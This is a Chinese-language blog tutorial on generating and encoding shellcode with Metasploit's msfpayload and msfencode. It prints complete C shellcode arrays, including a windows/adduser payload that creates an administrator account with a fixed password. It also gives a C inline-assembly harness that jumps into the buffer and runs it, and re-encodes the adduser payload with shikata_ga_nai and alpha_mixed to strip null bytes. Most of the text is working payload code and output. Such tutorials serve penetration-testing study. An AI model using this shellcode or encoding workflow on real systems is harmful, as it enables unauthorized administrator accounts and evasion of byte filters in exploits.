TITLE MessageBox yes Messagebox Title (max 255 chars)
Description:
Spawns a dialog via MessageBox using a customizable title, text &
icon
msf支持不同语言的shellcode,这里我们生成一个C语言格式的,指令如下:
root@bt:~# msfpayload windows/messagebox C /* * windows/messagebox - 270 bytes * http://www.metasploit.com * VERBOSE=false, PrependMigrate=false, EXITFUNC=process, * TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO */ unsigned char buf[] = "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b" "\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b" "\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24" "\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a" "\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" "\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c" "\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a" "\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2" "\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f" "\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52" "\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33" "\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56" "\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52" "\xe8\x61\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42" "\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58" "\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f" "\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89" "\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
使用C语言测试一下,生成的shellcode是否可以使用,代码如下:
/*
* windows/messagebox - 270 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
* TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
*/
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52"
"\xe8\x61\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58"
"\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89"
"\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
int main(int argc, char* argv[])
{
_asm{
lea eax,buf //获得buf地址
push eax //将地址压入堆栈
ret //跳转到地址进行执行
}
return 0;
}
查看执行效果
看标题太丑,想修改显示的内容,怎么办? 可以指定参数
root@bt:~# msfpayload windows/messagebox TITLE=Hello TEXT=World C /* * windows/messagebox - 250 bytes * http://www.metasploit.com * VERBOSE=false, PrependMigrate=false, EXITFUNC=process, * TITLE=Hello, TEXT=World, ICON=NO */ unsigned char buf[] = "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b" "\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b" "\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24" "\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a" "\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" "\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c" "\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a" "\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2" "\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f" "\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52" "\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33" "\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56" "\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52" "\xe8\x61\xff\xff\xff\x68\x6f\x58\x20\x20\x68\x48\x65\x6c\x6c" "\x31\xdb\x88\x5c\x24\x05\x89\xe3\x68\x64\x58\x20\x20\x68\x57" "\x6f\x72\x6c\x31\xc9\x88\x4c\x24\x05\x89\xe1\x31\xd2\x52\x53" "\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
如上方法,进行测试
修改成功!
生成可以直接执行命令的payload,使用X参数:
root@bt:~# msfpayload windows/messagebox X > messagebox.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/messagebox
Length: 270
Options: {}
root@bt:~# file messagebox.exe
messagebox.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
生成linux可以执行命令的文件
root@bt:~# msfpayload linux/x86/exec CMD=whoami X > whoami
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/exec
Length: 42
Options: {"CMD"=>"whoami"}
root@bt:~# file whoami
whoami: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
root@bt:~# ./whoami
bash: ./whoami: Permission denied
root@bt:~# chmod +x whoami
root@bt:~# ./whoami
root
生成一个可以添加账号的shellcode,账号是: USER=metasploit, PASS=Metasploit$1
root@bt:~# msfpayload windows/adduser C /* * windows/adduser - 289 bytes * http://www.metasploit.com * VERBOSE=false, PrependMigrate=false, EXITFUNC=process, * USER=metasploit, PASS=Metasploit$1, CUSTOM=, WMIC=false, * COMPLEXITY=true */ unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00" "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e" "\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72" "\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x4d\x65\x74" "\x61\x73\x70\x6c\x6f\x69\x74\x24\x31\x20\x2f\x41\x44\x44\x20" "\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f" "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f" "\x72\x73\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f" "\x41\x44\x44\x00";
可以执行成功。但发现里面有00字节,无法拷贝成功。因此需要使用msfencode进行编码输出。
ShellCode编码
使用msfencode进行编码
查看帮忙信息
root@bt:~# msfencode -h
Usage: /opt/metasploit/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,csharp,js_be,js_le,java,python,py,dll,exe,exe-small,exe-only,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v Increase verbosity
-x <opt> Specify an alternate executable template
查看支持的编码格式
root@bt:~# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
对生成的shellcode进行编码
root@bt:~# msfpayload windows/adduser R | msfencode -a x86 -e x86/shikata_ga_nai -t c -b "\x00" [*] x86/shikata_ga_nai succeeded with size 316 (iteration=1) unsigned char buf[] = "\xda\xca\xb8\xdf\x87\xb0\x47\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" "\x49\x31\x43\x18\x03\x43\x18\x83\xeb\x23\x65\x45\xbb\x33\xe3" "\xa6\x44\xc3\x94\x2f\xa1\xf2\x86\x54\xa1\xa6\x16\x1e\xe7\x4a" "\xdc\x72\x1c\xd9\x90\x5a\x13\x6a\x1e\xbd\x1a\x6b\xae\x01\xf0" "\xaf\xb0\xfd\x0b\xe3\x12\x3f\xc4\xf6\x53\x78\x39\xf8\x06\xd1" "\x35\xaa\xb6\x56\x0b\x76\xb6\xb8\x07\xc6\xc0\xbd\xd8\xb2\x7a" "\xbf\x08\x6a\xf0\xf7\xb0\x01\x5e\x28\xc0\xc6\xbc\x14\x8b\x63" "\x76\xee\x0a\xa5\x46\x0f\x3d\x89\x05\x2e\xf1\x04\x57\x76\x36" "\xf6\x22\x8c\x44\x8b\x34\x57\x36\x57\xb0\x4a\x90\x1c\x62\xaf" "\x20\xf1\xf5\x24\x2e\xbe\x72\x62\x33\x41\x56\x18\x4f\xca\x59" "\xcf\xd9\x88\x7d\xcb\x82\x4b\x1f\x4a\x6f\x3a\x20\x8c\xd7\xe3" "\x84\xc6\xfa\xf0\xbf\x84\x90\x07\x4d\xb3\xdc\x07\x4d\xbc\x4e" "\x6f\x7c\x37\x01\xe8\x81\x92\x65\x06\xc8\xbf\xcc\x8e\x95\x55" "\x4d\xd3\x25\x80\x92\xed\xa5\x21\x6b\x0a\xb5\x43\x6e\x57\x71" "\xbf\x02\xc8\x14\xbf\xb1\xe9\x3c\xdc\x58\x71\x91\x46\xdb\x1c" "\xcd\xa7\x78\xfe\x63\xdd\x0a\xde\x0e\x6e\x96\x6c\xd1\xfd\x3d" "\xe4\x70\x8d\xcd\x68\x1c\x18\x5a\x50\xaf\xbf\xd6\xf1\x5c\x30" "\x7b\x9e\xcb\xc4\xa7\x51\x2c\x0a\xe9\xd5\x68\x74\xcf\xf3\x50" "\x1a\x6a\x8f\xb0\x8e\x1b\x0c\xd0\x22\x83\xa0\x7d\xce\x3b\x64" "\xc3\x54\xd1\x0d\xad\xfd\x5a\xb9\x43\x9f\xe8\x2e\xd6\x2c\x31" "\xdd\x73\xa7\x50\x6e\x0c\x2b\xfc\xf9\x98\x93\x2d\xb8\x24\x90" "\x31";
编码后字符串已经没有00字符。其它编码测试
root@bt:~# msfpayload windows/adduser R | msfencode -a x86 -e x86/alpha_mixed -t c -b "\x00" [*] x86/alpha_mixed succeeded with size 640 (iteration=1) unsigned char buf[] = "\x89\xe6\xda\xce\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x79\x6c\x58\x68\x4c\x49\x45\x50\x43\x30\x63\x30\x63\x50\x6c" "\x49\x69\x75\x65\x61\x49\x42\x51\x74\x4c\x4b\x72\x72\x36\x50" "\x4e\x6b\x31\x42\x76\x6c\x4e\x6b\x62\x72\x37\x64\x4e\x6b\x71" "\x62\x31\x38\x74\x4f\x38\x37\x32\x6a\x75\x76\x46\x51\x49\x6f" "\x76\x51\x4b\x70\x4c\x6c\x75\x6c\x51\x71\x43\x4c\x36\x62\x66" "\x4c\x31\x30\x79\x51\x4a\x6f\x66\x6d\x53\x31\x39\x57\x38\x62" "\x38\x70\x36\x32\x46\x37\x6c\x4b\x72\x72\x56\x70\x4c\x4b\x47" "\x32\x57\x4c\x33\x31\x4a\x70\x4e\x6b\x43\x70\x70\x78\x4c\x45" "\x4f\x30\x73\x44\x53\x7a\x76\x61\x4e\x30\x36\x30\x4c\x4b\x52" "\x68\x57\x68\x4c\x4b\x66\x38\x77\x50\x47\x71\x5a\x73\x38\x63" "\x77\x4c\x32\x69\x6c\x4b\x37\x44\x6c\x4b\x65\x51\x7a\x76\x75" "\x61\x49\x6f\x64\x71\x39\x50\x6e\x4c\x79\x51\x48\x4f\x34\x4d" "\x66\x61\x68\x47\x37\x48\x6d\x30\x63\x45\x79\x64\x33\x33\x51" "\x6d\x68\x78\x77\x4b\x61\x6d\x55\x74\x52\x55\x4b\x52\x62\x78" "\x4c\x4b\x33\x68\x31\x34\x43\x31\x39\x43\x72\x46\x4c\x4b\x34" "\x4c\x70\x4b\x4c\x4b\x61\x48\x45\x4c\x45\x51\x6b\x63\x6c\x4b" "\x46\x64\x6e\x6b\x66\x61\x78\x50\x6d\x59\x73\x74\x71\x34\x56" "\x44\x43\x6b\x73\x6b\x73\x51\x66\x39\x71\x4a\x42\x71\x49\x6f" "\x59\x70\x61\x48\x63\x6f\x31\x4a\x4c\x4b\x52\x32\x78\x6b\x4c" "\x46\x61\x4d\x50\x6a\x76\x61\x6c\x4d\x4d\x55\x58\x39\x75\x50" "\x45\x50\x75\x50\x42\x70\x72\x48\x70\x31\x6c\x4b\x72\x4f\x4f" "\x77\x4b\x4f\x79\x45\x6f\x4b\x4a\x50\x6e\x55\x59\x32\x56\x36" "\x70\x68\x6f\x56\x5a\x35\x4d\x6d\x6d\x4d\x39\x6f\x48\x55\x47" "\x4c\x66\x66\x31\x6c\x74\x4a\x6d\x50\x39\x6b\x59\x70\x72\x55" "\x75\x55\x4d\x6b\x67\x37\x37\x63\x32\x52\x32\x4f\x73\x5a\x33" "\x30\x51\x43\x79\x6f\x59\x45\x33\x53\x32\x4d\x55\x34\x64\x6e" "\x62\x45\x71\x68\x61\x75\x37\x50\x36\x4f\x31\x73\x47\x50\x62" "\x4e\x75\x35\x52\x54\x31\x30\x70\x75\x61\x63\x33\x55\x50\x72" "\x45\x70\x30\x6d\x51\x75\x73\x44\x71\x71\x42\x53\x32\x50\x70" "\x6c\x72\x4f\x61\x79\x44\x34\x67\x50\x70\x4d\x33\x55\x73\x44" "\x30\x61\x64\x33\x44\x30\x32\x4c\x70\x6f\x65\x39\x63\x44\x35" "\x74\x74\x71\x65\x70\x64\x6f\x31\x51\x42\x64\x71\x54\x37\x50" "\x55\x76\x64\x66\x65\x70\x32\x4e\x35\x35\x63\x44\x67\x50\x30" "\x6c\x62\x4f\x72\x43\x75\x31\x30\x6c\x61\x77\x73\x42\x32\x4f" "\x72\x55\x62\x50\x37\x50\x33\x71\x75\x34\x52\x4d\x61\x79\x30" "\x6e\x61\x79\x70\x73\x44\x34\x64\x32\x70\x61\x52\x54\x62\x4f" "\x30\x72\x72\x53\x67\x50\x72\x4d\x51\x75\x51\x64\x55\x31\x32" "\x53\x54\x30\x32\x4c\x62\x4f\x61\x79\x31\x64\x67\x50\x66\x4f" "\x62\x61\x73\x74\x63\x74\x35\x50\x41\x41";
参考文献:
http://www.programlife.net/shellcode-test-template.html
浙公网安备 33010602011771号